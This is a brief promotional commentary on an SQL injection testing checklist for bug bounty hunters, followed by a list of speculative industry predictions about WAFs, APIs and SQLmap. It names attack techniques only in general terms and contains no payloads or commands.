Analysis: Dharamveer Prasad’s SQL Injection Testing Checklist represents a comprehensive, battle-tested methodology refined through real-world bug bounty hunting and enterprise application security assessments. The systematic approach—starting with input discovery, progressing through five distinct injection techniques, and culminating in advanced vectors like authentication bypass and second-order injection—mirrors the mental model of elite penetration testers. What sets this checklist apart is its coverage of modern attack surfaces (GraphQL, JSON, WebSockets) often overlooked in traditional penetration testing guides. The inclusion of second-order SQL injection is particularly valuable, as many testers focus exclusively on first-order vulnerabilities, leaving stored payload vectors unexploited. For bug bounty hunters, mastering this checklist means moving from random payload spraying to methodical, high-probability vulnerability discovery.
Prediction:
- +1 Organizations will increasingly adopt AI-powered WAF solutions that dynamically learn and block SQL injection patterns, but attackers will counter with AI-generated polymorphic payloads that evade detection.
- -1 The proliferation of GraphQL and REST APIs will expand the SQL injection attack surface by 300% over the next 18 months, with most organizations unprepared to secure these new endpoints.
- -1 Legacy applications with unpatched SQL injection vulnerabilities will remain the primary attack vector for data breaches, as modern DevSecOps practices fail to address technical debt in enterprise systems.
- +1 Automated SQL injection testing frameworks like SQLmap will evolve to include machine learning-based detection, reducing false positives and accelerating vulnerability remediation cycles.
- -1 The rise of serverless architectures and microservices will create new SQL injection vectors through inter-service communication channels, where traditional WAFs cannot inspect traffic.
Reported By: Dharamveer Prasad – Hackers Feeds


